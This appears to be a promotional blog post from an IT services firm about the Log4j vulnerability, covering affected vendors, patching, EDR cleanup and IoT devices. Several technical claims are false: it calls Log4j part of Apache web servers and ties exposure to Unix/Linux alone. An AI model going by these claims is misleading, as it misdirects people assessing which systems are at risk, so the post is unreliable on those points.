If you’re in the IT field, you’ve probably heard of the Log4J exploit. Log4j is, simply put, the biggest and most widespread software vulnerability in history. The ease with which a user can exploit the vulnerability is unprecedented, and Apache-based web servers – which contain a chunk of code called Log4j – are everywhere.
Software bugs crop up all the time, so why is this one different?
The software that’s being exploited is found in almost every organization and is spread across many product lines. We’re running across a lot of clients that might think they don’t run Unix or Linux and are safe (since those are the operating systems that run Apache that contains the Log4j software), but it is not true. The reasoning is sound, but it doesn’t consider the software solutions that vendors build that run on a Linux or Unix platform. The list of software built on Linux or Unix is extensive and should concern every organization as a top priority. It is not an exaggeration to say that this vulnerability affects billions of devices and applications – from security cameras to hosted cloud solutions such as SalesForce.
If your company runs Adobe, Amazon, Cisco, Citrix, Symantec, Broadcom, Docker, FortiGuard, F-Secure, IBM, McAfee, Okta, Oracle, Red Hat, Siemens, SolarWinds, SonicWall, Sophos, Splunk, TrendMicro, VMware, Ubiquiti, Ubuntu and Zscaler, you might be vulnerable. This list is not exhaustive, it’s just the most commonly used affected companies. For some of these companies, such as VMware, almost every product in their lineup is affected, and they’ve posted manual methods that will need to be implemented to resolve the vulnerability. Most other companies only have a select few products affected, so you need to check with the vendors to see exactly what is impacted.
What can be done?
The fact that Log4j affords a user the ability to run remote code easily means that an attacker has the ability to plant malicious software or bots on computers. That means that once the vulnerability is exploited, a user could plant software that will continue to run after the vulnerability is patched. The typical way an exploit is handled is to apply patches that come from vendors to resolve the issue, and this is certainly the case for Log4j as well.
Things to consider:
The most effective preventive step is to ensure that patches are applied for all software vendors over the next few months as they are released, but this is not enough.
This exploit requires a second step to clean out potentially affected systems. Detecting malicious software on servers requires more than the typical antivirus or malware detection software. It requires what is referred to as a next gen EDR or next gen antivirus. The experts at 5 Point are trained in these elevated detection methods and can quickly identify if your business is vulnerable.
Finally, this solution will affect devices and systems that do not run a typical operating system and will require manual intervention to resolve the issues that simple patching can’t resolve. This is when an IT team must be extra vigilant. If the organization has many IoT devices, each of these devices must be checked manually since they don’t run an automatic updater typically and can potentially exploit sensitive data, especially in the medical field where IoT devices are most common.